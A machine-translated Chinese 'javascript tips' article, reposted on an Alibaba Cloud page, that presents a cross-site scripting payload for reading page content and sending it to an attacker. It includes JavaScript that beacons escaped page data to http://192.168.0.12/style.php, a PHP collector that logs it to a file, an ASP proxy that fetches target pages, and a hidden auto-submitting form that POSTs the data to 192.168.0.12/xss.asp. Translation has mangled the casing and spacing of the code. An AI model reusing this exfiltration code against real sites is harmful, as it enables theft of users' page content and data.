XSS File page Content read (resolve)

XSS File page Content read (resolve) _javascript tips

Last Update:2017-01-19 Source: Internet

Author: User

Tags urlencode

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Js:

Copy Code code as follows:

Document.body.addBehavior ("#default #download");
var mycars = new Array ();
Mycars[0] = "l.htm";
MYCARS[1] = "y.htm";
for (x in Mycars)
{
if (Document.body.startDownload (Mycars[x],getdata)) {
GetData (source);
}
}

function GetData (source)
{
Txt=escape (source);
getreaded (TXT);
}
function getreaded (usr) {
var newimg = new Image ();
Newimg.src= "http://192.168.0.12/style.php?key=" + "\ n" + "\ n" +usr+ "\ n" + "\ n";
}

Php:

Copy Code code as follows:

<?php
Header (' content-type:text/html;charset=gb2312 ');
function Unescape ($STR) {
$str = Rawurldecode ($STR);
Preg_match_all ("/%u.{4}|& #x. {4};|&#\d+;|.+/u", $str, $r);
$ar = $r [0];
foreach ($ar as $k => $v) {
if (substr ($v, 0,2) = = "%u")
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("H4", substr ($v,-4));
ElseIf (substr ($v, 0,3) = = "& #x")
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("H4", substr ($v, 3,-1));
ElseIf (substr ($v, 0,2) = = "&#") {
$ar [$k] = Iconv ("UCS-2", "UTF-8", Pack ("n", substr ($v, 2,-1));
}
}
return join ("", $ar);
}
$file = "news.html";
$_get[' key ']=unescape ($_get[' key ');
Fputs (fopen ($file, ' A + '), $_get[' key ']);
?>

================================================= the following universal ===============

Copy Code code as follows:

<%
Response.Buffer = True
Dim Surlb,send (2)
Send (0) =escape (pagewebproxy ("http://192.168.0.5/sohu.htm"))
Send (1) =escape (Pagewebproxy ("http://192.168.0.5/c.htm"))
function Pagewebproxy (Xmlpath)
Dim I, Re, URL, Html
URL = Xmlpath

Set re = New RegExp
Re. IgnoreCase = True
Re. Global = True
SURLB = Url
Html = Gethttppage (URL)
url = Left (URL, InStrRev (URL, "/")
i = InStr (surlb, "?")
If i > 0 Then
SURLB = Left (surlb, i-1)
End If
Re. Pattern = "(href|action) = (\ ' | ' |")? (\?)"
Html = Re. Replace (Html, "$1=$2" & surlb & "?")
Re. Pattern = "(src|action|href) = (\ ' | ' |")? ((Http|https|javascript): [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) (\ ' | "")? "
Html = Re. Replace (Html, "$1x=$2$3$2")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? ((HTTP|HTTPS):(\/\/|\\\\) [a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$1x ($2$3$2)")
Re. Pattern = "(src|action|href|background) = (\ ' | ' |")? ([^\/"" \ "][a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' |" ")?"
Html = Re. Replace (Html, "$1=$2" & Url & "$3$2")
Re. Pattern = "(src|action|href|background) = (\ ' | ' |")? \/([^ "" \ '][a-za-z0-9\./=\?%\ -&_~ ' @[\]:+!] + ([^\ ' <> "]) +) (\ ' |" ")?"
Html = Re. Replace (Html, "$1=$2http://" & Split (URL, "/") (2) & "/$3$2")
Re. Pattern = "(src|action|href) = (\ ' | ' |")? \/(\'|"")?"
Html = Re. Replace (Html, "$1=$2http://" & Split (URL, "/") (2) & "/$2")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? ([^\/"" \ "http:][a-za-z0-9\./=\?%\ -&_~ ' @[\]+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$" & Url & "$3$2)")
Re. Pattern = "(Window\.open|url) \ ((\ ' | ' |")? \/([^ "" \ ' http:][a-za-z0-9\./=\?%\ -&_~ ' @[\]+!] + ([^\ ' <> "]) +) (\ ' | ' |")? \)"
Html = Re. Replace (Html, "$ ($2http://" & Split (URL, "/") (2) & "/$3$2")
HTML = Replace (HTML, "&", "%26")
If Split (URL, "/") (2) = "club.isso.com.cn" Then
HTML = Replace (HTML, "%26amp;", "%26")
Else
HTML = Replace (HTML, "%26amp;", "&")
End If
HTML = Replace (HTML, "%26NBSP;", "")
HTML = Replace (HTML, "%26LT;", "<")
HTML = Replace (HTML, "%26GT;", ">")
HTML = Replace (HTML, "%26quot;", "" ")
HTML = Replace (HTML, "%26copy;", "©")
HTML = Replace (HTML, "%26reg;", "®")
HTML = Replace (HTML, "%26raquo;", "»")
HTML = Replace (HTML, "%26%26", "&&")
HTML = Replace (HTML, "%26#", "&#")
' HTML = Replace (HTML, '%26 ', ' "')
Re. Pattern = "(src|action|href) x= (\ ' |")? ((Http|https|javascript): [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) (\ ' | "")? "
Html = Re. Replace (Html, "$1=$2$3$2")
Re. Pattern = "((HTTP|HTTPS):(\/\/|\\\\) [a-za-z0-9\./=\?%\ -&_~ ' @[\]\ ': +!] + ([^<> ""]) +) "'" (gif|jpg|bmp|png)) "
Html = Re. Replace (Html, "? url=$1")
Re. Pattern = "\?url=" & URL & "(#|javascript:)"
Html = Re. Replace (Html, "$")
Re. Pattern = "Multipart\/form-data"
Html = Re. Replace (Html, "")
Pagewebproxy=html
End Function
Function gethttppage (URL)
Dim Http, Thestr, Fileext
Set Http = Server.CreateObject ("MSXML2.") XMLHTTP ")
If Request.Form.Count > 0 Then
For each x in Request.Form
Thestr = thestr & Server.URLEncode (x) & "=" & Server.URLEncode (Request.Form (x)) & "&"
Next
Http.open "POST", url, False
Http.setrequestheader "Content-type", "application/x-www-form-urlencoded"
Http.send (THESTR)
Else
Http.open "Get", url, False
Http.send ()
End If
If Http.readystate<>4 then Exit Function
Fileext = LCase (Mid (URL, InStrRev (URL, ".") + 1)
If InStr ("$jpg $gif$bmp$png$js$", "$" & Fileext & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responsebody
Response.End ()
Else
If InStr ("$rar $mdb$zip$exe$com$ico$", "$" & Fileext & "$") > 0 Then
Response.AddHeader "Content-disposition", "attachment"; Filename= "& Mid" (SURLB, InStrRev (SURLB, "/") + 1)
Response.BinaryWrite Http.responsebody
Response.Flush
Else
Gethttppage = Bytestobstr (Http.responsebody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function Bytestobstr (Body,cset)
Dim objstream
Set objstream = Server.CreateObject ("ADODB.stream")
Objstream. Type = 1
Objstream. Mode =3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
Bytestobstr = objstream. ReadText
Objstream. Close
Set objstream = Nothing
End Function
%>

Document.writeln ("<iframe name=\" mimi\ "Src=about:blank style=display:none><\/iframe>")
Document.writeln ("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=post target=mimi>");
Document.writeln ("<input id=var name=var type=hidden>");
Document.writeln ("<input id=vartwo name=vartwo type=hidden>");
Document.writeln ("<input type=submit style=display:none>");
Document.writeln ("<\/form>")
document.getElementById ("var"). Value = ' http://192.168.0.5/sohu.htm ' +unescape (' <%=send (0)%> ');
document.getElementById ("Vartwo"). Value = ' http://192.168.0.5/c.htm ' +unescape (' <%=send (1)%> ');
document.getElementById ("form"). Submit ();

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More